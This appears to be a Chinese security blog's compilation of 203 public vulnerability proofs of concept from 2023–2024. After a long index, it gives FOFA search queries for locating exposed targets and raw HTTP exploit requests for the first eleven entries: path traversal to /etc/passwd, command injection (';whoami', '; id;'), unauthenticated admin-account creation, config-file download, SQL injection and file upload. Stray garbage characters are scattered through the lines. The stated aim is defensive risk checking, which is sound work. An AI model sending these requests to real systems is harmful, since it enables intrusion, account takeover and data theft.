互联网公开漏洞整理202309-202406
7 f, t' y' v6 h4 U; m道一安全 2024-06-05 07:41 北京
0 o3 j1 A% U$ o2 t! {8 Q1 C& m以下文章来源于网络安全新视界 ,作者网络安全新视界4 l; _1 T' z( x4 i1 n+ o
5 W& h! x( q9 I* K发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。+ ?: Y0 [8 b( D6 _$ a k0 j; \3 @
4 z. c3 x$ f0 m
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
+ H) t5 u' M) w1 R J- W
1 K1 e1 x9 L* a6 B3 w安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
& b7 v! y: O; `. x( [( B; ?
; \& y; C# b) f$ K7 S文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。1 {" j& Z, C$ v/ O3 C
* q9 T8 F" K8 H/ ?: a8 N
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
+ K4 t$ `" U8 c. m- C$ ~4 f( j7 L# c* u" y! L
6 n' \* M. B/ \; ^声明
; {% a9 u8 O5 J* @4 p
+ F* _8 F# n L为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。1 I( [3 I: `' Y/ y; r% X
; X( P6 T: z% d# s: q有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。% K2 b3 g+ n; _' g. p, R# {
. m. X% H. Q. G0 s, i+ a1 M3 [- P
' _1 Q6 h! l3 h; @* y
1 B- V' D( P$ }6 w# d目录
2 J9 U5 {# G, W9 h3 p0 ]. ^7 V- J) q% I
01
U& B8 l* C8 B1 ?7 o; i: z9 _3 M* {; N2 ?
1. StarRocks MPP数据库未授权访问( J/ m1 P3 u w& A
2. Casdoor系统static任意文件读取, \, C8 f0 A' T# ?7 @+ h. J2 w
3. EasyCVR智能边缘网关 userlist 信息泄漏3 N: q( I+ L- R6 c, z5 Z- n5 m
4. EasyCVR视频管理平台存在任意用户添加
1 b, Y1 L" \, o A. w1 F5. NUUO NVR 视频存储管理设备远程命令执行& b5 l" s2 T! t- S7 S
6. 深信服 NGAF 任意文件读取
* @" L- h' Y4 e+ _; G) r7. 鸿运主动安全监控云平台任意文件下载
s& L9 K# U! q; i& | v8. 斐讯 Phicomm 路由器RCE
/ d7 r3 j) F3 G1 i& c9 I+ ?9. 稻壳CMS keyword 未授权SQL注入
' l& |9 E3 q) K3 {" m10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
# ?! h2 y3 }: |11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
( \0 z& p" J9 S% p" q' S. T2 Q, r12. Jorani < 1.0.2 远程命令执行
% k+ O |$ q- \. S# w13. 红帆iOffice ioFileDown任意文件读取
- P# V3 M4 V* d, F* A14. 华夏ERP(jshERP)敏感信息泄露
( p5 [; `# N* ^. N; |- ^15. 华夏ERP getAllList信息泄露# C8 ?! a; M. c
16. 红帆HFOffice医微云SQL注入$ e2 e$ Q. L7 Y a. C
17. 大华 DSS itcBulletin SQL 注入$ i: A) S4 \3 B4 Z- s8 j5 B7 J
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露3 y* F. W% Q% w- _: i
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入9 n6 k# q6 q: f) S+ U, J
20. 大华ICC智能物联综合管理平台任意文件读取3 p# Q+ s0 q; m( p
21. 大华ICC智能物联综合管理平台random远程代码执行
# v; W$ n/ H- A$ A6 V22. 大华ICC智能物联综合管理平台 log4j远程代码执行 {- A8 }+ h4 l$ t: O
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
6 s7 [) J; }3 z24. 用友NC 6.5 accept.jsp任意文件上传
* ]& D/ f% k1 q6 z% `25. 用友NC registerServlet JNDI 远程代码执行
! P+ c% T9 K' i- w S* j5 g26. 用友NC linkVoucher SQL注入
2 H2 n* X2 g/ _; Z3 o27. 用友 NC showcontent SQL注入/ n( L4 i: ?, o8 K( o
28. 用友NC grouptemplet 任意文件上传
$ c3 E; J/ W8 F6 {* w1 H29. 用友NC down/bill SQL注入: R$ y2 q! d w2 u
30. 用友NC importPml SQL注入
5 ^7 e" k9 E9 |. O8 b& w; e31. 用友NC runStateServlet SQL注入* Y. p; T. H* Y$ c- o1 Q
32. 用友NC complainbilldetail SQL注入
/ _; w; v" |& b# ^3 E& d2 c# _2 Y, j33. 用友NC downTax/download SQL注入0 v5 J6 g O2 p, J: Y4 L% l% \
34. 用友NC warningDetailInfo接口SQL注入 h* n9 t' Q* ~/ g" X; v
35. 用友NC-Cloud importhttpscer任意文件上传
) i' C+ s1 L: C. r/ G36. 用友NC-Cloud soapFormat XXE
N% b0 D1 c* A8 X9 h37. 用友NC-Cloud IUpdateService XXE
% J" m/ n. B* }) ? l38. 用友U8 Cloud smartweb2.RPC.d XXE7 t3 }$ x& J/ f! l
39. 用友U8 Cloud RegisterServlet SQL注入5 P# j L4 |& F( U% Z* R
40. 用友U8-Cloud XChangeServlet XXE
* i' L. v- m, k4 g! U. D41. 用友U8 Cloud MeasureQueryByToolAction SQL注入) c3 L+ k V, x& V+ ?! {2 z) w7 t/ K& Y
42. 用友GRP-U8 SmartUpload01 文件上传/ V0 H7 @" Q9 M* T0 S
43. 用友GRP-U8 userInfoWeb SQL注入致RCE3 ^8 l" b, ~, S: u% o' d
44. 用友GRP-U8 bx_dj_check.jsp SQL注入3 l( |; S, o- \0 {3 A. i
45. 用友GRP-U8 ufgovbank XXE+ F3 h ~* w2 D2 x! k; x2 X( k& j5 ~3 j
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
5 d' b" l. F) Y; a' Z" R; {47. 用友GRP A++Cloud 政府财务云 任意文件读取7 ?. T: l7 F" o& u
48. 用友U8 CRM swfupload 任意文件上传, z0 M; c9 k$ P: {9 m5 \
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
i; }; L2 I: J5 l8 a50. QDocs Smart School 6.4.1 filterRecords SQL注入
: r8 Q) Q) |$ R1 b2 k/ Q" ]" B( n51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
G, E5 a6 }1 v. R52. 泛微E-Office json_common.php sql注入& l( \5 ^# [" L2 o1 C9 Z
53. 迪普 DPTech VPN Service 任意文件上传3 q7 S2 q/ D8 [- m. v8 Q# e
54. 畅捷通T+ getstorewarehousebystore 远程代码执行5 j; i) B, m) f+ V7 H6 F& z
55. 畅捷通T+ getdecallusers信息泄露" J. T' d8 }; D. E9 \
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
! S% K5 P0 ~# g: x2 @* k57. 畅捷通T+ keyEdit.aspx SQL注入1 t, `) l% `6 F' N8 P6 {; [
58. 畅捷通T+ KeyInfoList.aspx sql注入; C4 H( ~6 } s7 q1 Y, b m# ]2 ~ w
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行1 P- n+ w) l0 m3 A& y
60. 百卓Smart管理平台 importexport.php SQL注入
0 W/ {; R" e3 s) A/ `61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
; ]9 R% ^) a" D# o( Z. L0 |! @62. IP-guard WebServer 远程命令执行
4 a+ x1 @+ [! D1 W, b63. IP-guard WebServer任意文件读取
# o7 K% R! K0 I$ ?9 t9 K64. 捷诚管理信息系统CWSFinanceCommon SQL注入
& O9 c T! f7 U. R0 ^1 [65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
! i! ?2 i5 u/ w) M66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
5 ]2 l5 Y9 s- v( i67. 万户ezOFFICE wpsservlet任意文件上传
' l) g" G" ~7 Q8 ?* c68. 万户ezOFFICE wf_printnum.jsp SQL注入
# s% l0 F+ p! m, `+ i9 e69. 万户 ezOFFICE contract_gd.jsp SQL注入
, [/ \- H+ }0 |* O70. 万户ezEIP success 命令执行+ f3 R, A0 t8 i4 s9 k: I
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入 B% _$ L# x8 I' d9 i' `* N
72. 致远OA getAjaxDataServlet XXE K% i4 t% \8 s$ ?0 o/ a
73. GeoServer wms远程代码执行, t/ ~% ~7 n( m; B8 U% M/ L7 V$ J
74. 致远M3-server 6_1sp1 反序列化RCE, M. c9 ?6 s3 h3 }9 z6 V7 X
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
# G! ?% w) G3 n7 [' y, {, M4 X; D76. 新开普掌上校园服务管理平台service.action远程命令执行 G h9 ]3 }. [' M m' u
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
' Z- A# r( i' |# `& U78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
) A' _" @. X4 E7 G$ ~' t& U79. BYTEVALUE 百为流控路由器远程命令执行8 ?( A6 R& X$ M; m
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
9 H, i. @/ v$ T3 m81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露6 v' S! T0 k/ g9 K8 \2 H# N
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行" [1 h0 S3 m& _; n6 x
83. JeecgBoot testConnection 远程命令执行
; `6 A3 b: v& X" Q4 C5 L$ b" p84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
4 @; f, O$ d- N3 A: L/ u8 W85. SysAid On-premise< 23.3.36远程代码执行
' |( V$ o* ]+ T8 Q4 J' E7 V0 X86. 日本tosei自助洗衣机RCE$ I. H7 K) ]* s, v/ n/ H
87. 安恒明御安全网关aaa_local_web_preview文件上传. l4 f, i5 [8 {7 n: u s
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
! l2 Y) K/ S h" z' ?# \89. 致远互联FE协作办公平台editflow_manager存在sql注入* @0 r4 \1 U- J
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
3 s+ a6 u E4 I* D6 p91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取$ A' T: e$ h- s
92. 海康威视运行管理中心session命令执行
' U& R( E! d) h93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传& }) k% Y6 k4 a/ R$ u0 }7 F
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传* R2 z8 w( p; ^5 N& ~7 G
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
# F2 @% \ l5 C e9 o5 G96. Apache OFBiz 18.12.11 groovy 远程代码执行
& }5 u, p; ^3 ^; w8 w97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
6 J% X/ E, H0 R* I98. SpiderFlow爬虫平台远程命令执行
/ j4 X1 R6 d% N; V99. Ncast盈可视高清智能录播系统busiFacade RCE
5 P0 t- g+ v n8 y5 o' ^6 n2 x' N100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传! g4 D1 f/ E& D. L4 i2 U |
101. ivanti policy secure-22.6命令注入7 x! F9 l1 y* j K
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行5 I8 s! i9 J# M/ H8 |
103. Ivanti Pulse Connect Secure VPN XXE( \1 F9 Q. d2 a: s9 \. a6 n* s' R
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
6 H/ }$ ?2 m7 j105. SpringBlade v3.2.0 export-user SQL 注入
1 H4 ]) s6 c7 Y' X6 V106. SpringBlade dict-biz/list SQL 注入
- f& ~+ @' }; m107. SpringBlade tenant/list SQL 注入
! C* F. g$ F' a108. D-Tale 3.9.0 SSRF6 N3 O; m4 r9 W9 n
109. Jenkins CLI 任意文件读取4 B5 T4 N, p; d% p* e
110. Goanywhere MFT 未授权创建管理员
6 m7 A( n/ @( m( D# U8 o& v1 X111. WordPress Plugin HTML5 Video Player SQL注入- a" x# T! y8 K4 u
112. WordPress Plugin NotificationX SQL 注入
4 S. p* X1 U2 S& h: }113. WordPress Automatic 插件任意文件下载和SSRF8 q% E$ ~& G y3 X" B. G( R. R9 m& t
114. WordPress MasterStudy LMS插件 SQL注入* Q1 t4 o& I# `$ r4 Y
115. WordPress Bricks Builder <= 1.9.6 RCE
: V( h& P( R/ j" T9 A116. wordpress js-support-ticket文件上传 ?/ C: E; O, R9 n2 b, R+ u7 Z" k
117. WordPress LayerSlider插件SQL注入
+ N0 D J/ H/ V$ `+ n0 t118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
2 d- I! h) C5 y9 C X1 |- |4 D0 i119. 北京百绰智能S20后台sysmanageajax.php sql注入
' j: @$ @4 d( H; m5 J120. 北京百绰智能S40管理平台导入web.php任意文件上传
; C& u* ~, V7 ?# s+ C- Z121. 北京百绰智能S42管理平台userattestation.php任意文件上传, k/ e9 a0 A# }, ~
122. 北京百绰智能s200管理平台/importexport.php sql注入
3 r$ W2 W8 Y u! A" M# \* a7 K- o123. Atlassian Confluence 模板注入代码执行
9 h2 E% S/ {3 `" K$ _! z* f% L4 E124. 湖南建研工程质量检测系统任意文件上传. O. t$ f) F0 ?( d% R) _
125. ConnectWise ScreenConnect身份验证绕过
2 x" e. w( ]& G+ A1 P* H! ]. d" p4 c126. Aiohttp 路径遍历/ e0 ?$ u7 r9 x, o$ w
127. 广联达Linkworks DataExchange.ashx XXE
2 q- {4 ~6 q, G* X; W! _128. Adobe ColdFusion 反序列化
9 W8 i0 n* `5 Q3 K129. Adobe ColdFusion 任意文件读取, T( e. {' `* B$ J. M
130. Laykefu客服系统任意文件上传$ o# U4 B# R1 O% E5 k5 p
131. Mini-Tmall <=20231017 SQL注入+ v* {+ f; x4 D+ O* C2 O& F7 K g0 ^
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过1 |$ m1 n1 k3 {5 C
133. H5 云商城 file.php 文件上传
0 y% {7 \ E' j5 V/ a. V' L134. 网康NS-ASG应用安全网关index.php sql注入
. v& \" U8 x* v135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入8 r- G: m. A3 W3 R( P7 i1 }8 v4 D
136. NextChat cors SSRF" {7 r, ^6 c; E E0 M$ a: b& U
137. 福建科立迅通信指挥调度平台down_file.php sql注入
1 t. h5 |; S" H! S& N5 z8 h: V138. 福建科立讯通信指挥调度平台pwd_update.php sql注入" ]* K5 {8 i9 _* R/ r- R
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
' m$ Z$ S2 A" ^) A) X140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入2 Y2 Q i# g2 y+ f& f
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
o! `! I* b0 C% }. k* H8 M142. CMSV6车辆监控平台系统中存在弱密码0 Y8 L O9 P5 L0 O
143. Netis WF2780 v2.1.40144 远程命令执行
$ s, k1 @: B k( B8 K1 n144. D-Link nas_sharing.cgi 命令注入 x/ J; a' F8 b$ D& g0 Y
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入) L& e! b) h H# k& R; Z' Q
146. MajorDoMo thumb.php 未授权远程代码执行0 A3 c' I4 c; N+ v8 C
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
4 g3 n( n5 Q4 ]% Q5 }( ^. S148. CrushFTP 认证绕过模板注入
4 @7 _+ c+ ]. U149. AJ-Report开源数据大屏存在远程命令执行4 X) _2 U! r5 r3 L
150. AJ-Report 1.4.0 认证绕过与远程代码执行* q$ a! o- t2 ^6 v* A# v
151. AJ-Report 1.4.1 pageList sql注入
1 ^) C9 B! Q5 W( Z/ x: T% a5 r152. Progress Kemp LoadMaster 远程命令执行
* y( n0 m5 s2 P+ G3 }153. gradio任意文件读取0 T3 p" ^7 I* [, _- ~. V
154. 天维尔消防救援作战调度平台 SQL注入. _$ B5 F$ }; u0 l, t( x) V
155. 六零导航页 file.php 任意文件上传
7 n1 y/ i. K& G( }' `, B4 q; M+ b$ B156. TBK DVR-4104/DVR-4216 操作系统命令注入+ Q: Y& c, r- @# p. |
157. 美特CRM upload.jsp 任意文件上传% }+ B' n2 c' i8 D+ i( W. {
158. Mura-CMS-processAsyncObject存在SQL注入1 C* k6 A+ |4 A$ v
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传) X5 Q8 A& X9 J/ n9 M) S; p
160. Sonatype Nexus Repository 3目录遍历与文件读取" \( j2 k, r: z) \, O7 ]# g
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传. E# a; l8 X* g V
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传3 T3 i N |7 F; Q
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
9 t% T* p! O& D- S3 R164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传6 X- e# b$ ` A8 Q4 B1 p: x% q
165. OrangeHRM 3.3.3 SQL 注入
0 A0 k% _2 W6 j/ Y; `$ e1 l! H* r166. 中成科信票务管理平台SeatMapHandler SQL注入
3 Y1 o" [5 \" s1 Y167. 精益价值管理系统 DownLoad.aspx任意文件读取4 g- t* q7 f' e* o
168. 宏景EHR OutputCode 任意文件读取
' e8 r8 K' n w0 C( q. s3 e! ]169. 宏景EHR downlawbase SQL注入% L, j* ]3 ^9 g! B- T
170. 宏景EHR DisplayExcelCustomReport 任意文件读取7 }5 b8 p* L/ h1 F
171. 通天星CMSV6车载定位监控平台 SQL注入
5 j; l9 B+ @7 c7 {. b172. DT-高清车牌识别摄像机任意文件读取
4 E) f+ f% x9 u2 n173. Check Point 安全网关任意文件读取
$ _* B& D. m. L+ w4 }( [174. 金和OA C6 FileDownLoad.aspx 任意文件读取
) U0 x1 S e0 G o: |' q; d175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
1 B. o( @5 S# o% Y176. 电信网关配置管理系统 rewrite.php 文件上传
& T! n/ D0 p# ]# q8 M2 y& d177. H3C路由器敏感信息泄露6 ^' B8 k) C# z: `" f
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
: T: s2 ]% m: x179. 建文工程管理系统存在任意文件读取; j0 E9 P7 F, c
180. 帮管客 CRM jiliyu SQL注入
$ b4 R6 U3 Z1 _181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入8 q& S3 `% H; ~6 {) i4 P
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建1 o& [$ _9 W* I; R
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
. i7 {$ D. Z J9 V6 R184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
) h* a- o. k: Q185. 瑞友天翼应用虚拟化系统SQL注入4 r* s! a% e, t: h$ N& h
186. F-logic DataCube3 SQL注入8 V3 J& Z9 Z: @$ z4 h% H
187. Mura CMS processAsyncObject SQL注入
+ W1 b% R4 Y7 n* z! {! b188. 叁体-佳会视频会议 attachment 任意文件读取
: M# J% ?; @* x& A+ |% N3 b6 Y189. 蓝网科技临床浏览系统 deleteStudy SQL注入5 W: J/ I% o4 u; U0 l* ~7 ?
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
; {0 n. p, M+ K* \1 C9 f# J* l191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
. X# K! h) L+ V7 m) q, F' ]/ ~6 ~192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
3 o1 w9 A( G; t! a1 Y193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行+ o5 P5 u. w7 M: T# o3 x
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
5 G5 E( O; V. d3 S195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
4 Y6 {" |/ V$ g. D0 a/ S196. 河南省风速科技统一认证平台密码重置
- V, w8 Z- q8 Y4 }' w- A$ ]6 I197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入2 F+ c5 m% h& t
198. 阿里云盘 WebDAV 命令注入
: X n+ L. @: V/ P, m199. cockpit系统assetsmanager_upload接口 文件上传1 ^( t4 p( e/ _( j, u. E" I# k7 K6 r
200. SeaCMS海洋影视管理系统dmku SQL注入7 C8 M: j0 y% O, A C) y
201. 方正全媒体新闻采编系统 binary SQL注入9 R8 i" P1 B- D0 Y
202. 微擎系统 AccountEdit任意文件上传' H1 d" E/ X! E4 h0 b! l# R
203. 红海云EHR PtFjk 文件上传
. e+ h- b9 O! x5 m, K
1 T+ U7 `. D0 wPOC列表4 ~5 o; F; ~' d
: f" Q0 _! H2 C: L+ L02- {- Y1 [; Y- m0 V1 c6 Q5 I
% M1 X& r8 `; b5 v# I9 `6 J6 o
1. StarRocks MPP数据库未授权访问# k. n5 q, [7 O( Y4 T2 B
FOFA :title="StarRocks"" [- G$ d5 l. ]; `3 v
GET /mem_tracker HTTP/1.1
3 u9 i: F; F0 |7 M- ^Host: URL
# f' j' |% _( B& \' J
3 K/ p$ W2 N9 V3 ^7 v" Q
! V) {. g" i- Y1 h! {' p2. Casdoor系统static任意文件读取9 ~, l. e% z: L9 u7 n7 c2 m
FOFA :title="Casdoor"; o0 x& Y% p* w" l' p0 n$ [" ^
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.12 d" f7 C" `9 m4 v6 J( v% P L. y/ o
Host: xx.xx.xx.xx:9999# d) r/ @& N- l7 O. @0 D2 ^! _1 j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 _. {! x* A) n) G' _, t% k
Connection: close
6 X3 l, F( t5 m9 _) V4 W6 nAccept: */*
" \. Q% N2 j( N' QAccept-Language: en, S2 _* g1 R5 D+ |( g
Accept-Encoding: gzip5 B# p0 Z0 _& j/ e3 r9 v8 Q
( \2 i; Q: q# }; ^4 ^8 w& O5 d. x5 c/ a9 W
3. EasyCVR智能边缘网关 userlist 信息泄漏, Z5 n5 T6 U0 q8 a, y1 ]4 p5 y
FOFA :title="EasyCVR"# a6 w0 q+ q* W2 n1 c, Y$ d
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.19 s4 V3 y: r0 i" D* m8 g! n
Host: xx.xx.xx.xx' d% U% J; H6 `2 A7 l
9 H! q5 ^ P7 K7 M8 X0 a) `* v9 ?
4 |% K' [" W* c% f, S
4. EasyCVR视频管理平台存在任意用户添加2 f$ q* R2 O- N% x& V; q, n
FOFA :title="EasyCVR"
. F/ f% F, L3 }" }8 s+ m+ a! r) x) Y/ B, Z& x) H n8 W$ `2 @
password更改为自己的密码md54 r& V' }# g# R# o
POST /api/v1/adduser HTTP/1.15 N% _* Q4 B/ {3 d
Host: your-ip
6 S1 t, V+ m6 Q5 S& MContent-Type: application/x-www-form-urlencoded; charset=UTF-8
$ Q% ~, j3 q- b2 B( L' |0 L+ U
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
, ?: `4 J8 u' h" s, ~ ~- C9 Q" i) K- a! U
3 R( H8 Y/ q \+ Z8 H0 p5. NUUO NVR 视频存储管理设备远程命令执行, K4 |5 |6 r: m, F
FOFA:title="Network Video Recorder Login"3 U* i Y! ]( H) ?$ D8 O
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
) O, v* g" _3 r1 t8 q7 }Host: xx.xx.xx.xx
/ n1 p7 S+ |7 {
. ^( A( D1 u! E5 k
1 o% Z' G# {$ y6. 深信服 NGAF 任意文件读取: g$ a8 U, H5 M# W
FOFA:title="SANGFOR | NGAF"
# k4 E0 a3 A3 \, B& ^GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
: d' `/ d1 y* h1 s1 G1 MHost:
4 f( h+ ]! P9 t0 o- l* T* i" k! V* n
2 C( k, D6 ~- M- a: [8 E
7. 鸿运主动安全监控云平台任意文件下载
( L& x4 f* M" W7 zFOFA:body="./open/webApi.html"
& E2 c2 M4 X( {. V& s4 }6 t# q$ QGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1$ U9 S. n9 a, [4 o8 f
Host:, s2 O7 b/ q2 v/ n
7 S2 ^! [8 w: P3 l; ]2 J8 i# u& F$ r; E
8. 斐讯 Phicomm 路由器RCE
4 t) h" r2 Z8 _7 s' t CFOFA:icon_hash="-1344736688"
0 f p: Z, p8 T2 s- I) v4 ~0 k默认账号admin登录后台后,执行操作+ K1 \+ i% ?9 d' C
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
* N/ U- e7 }7 v7 e5 L8 MHost: x.x.x.x
0 X8 C A* r4 V( a7 R9 bCookie: sysauth=第一步登录获取的cookie+ B% Q% J" Z7 V' W" C, |' ]/ a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
* Q# k' X# `3 F# T i+ E- \- sUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
$ Y3 s) b% R( L" f% O0 C ?; W
------WebKitFormBoundaryxbgjoytz
! Y$ s Q: I- K2 H% y* DContent-Disposition: form-data; name="wifiRebootEnablestatus", g' P6 q' V8 x. k" I9 L
/ T8 ^% I @2 x% y. i%s
: I0 `" t; H: L: }* B" \- S------WebKitFormBoundaryxbgjoytz$ d: a/ F0 Q) Q8 k0 r
Content-Disposition: form-data; name="wifiRebootrange"
! W4 q+ P+ L* l. H L; L! _ q- l& U w9 `: F
12:00; id;
6 g" n# c0 Z* J1 i) W$ J------WebKitFormBoundaryxbgjoytz: [, i: d3 R' J' G
Content-Disposition: form-data; name="wifiRebootendrange"
; D" q6 T V) m
" D% s- o' s6 X3 ] r" P; r8 u$ R4 L' d%s:
( f6 l7 s" @! Q8 h3 w------WebKitFormBoundaryxbgjoytz5 P) ~& u C2 E) v' R4 p/ U1 E
Content-Disposition: form-data; name="cururl2"- I) V$ r/ {1 A7 M3 B4 ^
c3 U. p8 H' `" o/ k9 ?: p6 U( S
------WebKitFormBoundaryxbgjoytz--/ T, U1 y; @: j3 v, q7 v
: o. x) k& i! `* f a+ t
6 z1 G2 f9 n7 K# j9. 稻壳CMS keyword 未授权SQL注入+ n9 P# @7 D2 K) L6 R( Y* O
FOFA:app="Doccms"
+ j+ y* u% b! q0 u* Z3 gGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
6 g9 {- J' o5 q! C& pHost: x.x.x.x4 g. M, t* d7 i& a6 S! C* h/ c
$ }. I: a* r2 O5 X& B5 D1 p6 c- Q4 D7 D4 s" f4 U; H' S' D
payload为下列语句的二次Url编码# b: T1 ~+ G0 ~: e2 ~0 t- s
0 R5 a, t, @4 x
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#! w# H0 |7 g* A5 K
( _# `) F- M# ?& z' g7 J
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
: f+ U3 E2 a* L: hFOFA:icon_hash="953405444"
9 ]7 M, T4 Q# s' p0 d
* I$ l* A# F, C9 {, I8 J文件上传后响应中包含上传文件的路径
7 D. h5 b& _6 t/ @POST /eis/service/api.aspx?action=saveImg HTTP/1.1
% p/ @7 R- h, l6 a% R) x' J0 }3 {Host: x.x.x.x:xx
. e% Y+ V$ y8 L+ ?* u6 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36+ y/ _5 w9 d0 [
Content-Length: 197
0 J2 `. `$ f0 Z6 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 u1 p' ]& c# b1 `9 \# u
Accept-Encoding: gzip, deflate$ S1 m# K. K7 E" B- B) p$ t: {) S
Accept-Language: zh-CN,zh;q=0.9' P' @ E' R, s: H
Connection: close, l! Y! }1 S0 u+ j' q: H I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
; T0 D9 @% _3 K/ t8 j* |% d3 O# Q/ C6 g: e/ T6 u& s ?
------WebKitFormBoundaryxdgaqmqu
( ~1 X8 s7 q3 |" M7 Z) nContent-Disposition: form-data; name="file"filename="icfitnya.txt"
& I" A/ O E0 x1 E3 M- Z' ^% EContent-Type: text/html2 P6 Y* T- ~+ z) w/ E
' O7 u4 }2 a7 D8 `
jmnqjfdsupxgfidopeixbgsxbf
* ?5 Q" M" O1 C; Y; R1 H! \------WebKitFormBoundaryxdgaqmqu--& k% Z/ B7 ?6 y% U# J4 [
0 ?$ N; V9 `: E* N' `* f
8 g d8 I! Y/ `: X. _: y11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
, O, L4 S2 ]) k& w5 z8 iFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
7 P9 C/ S5 ^3 L8 q4 o/ r4 OGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
* B. I4 D# {3 }5 S, R% [Host: 127.0.0.1
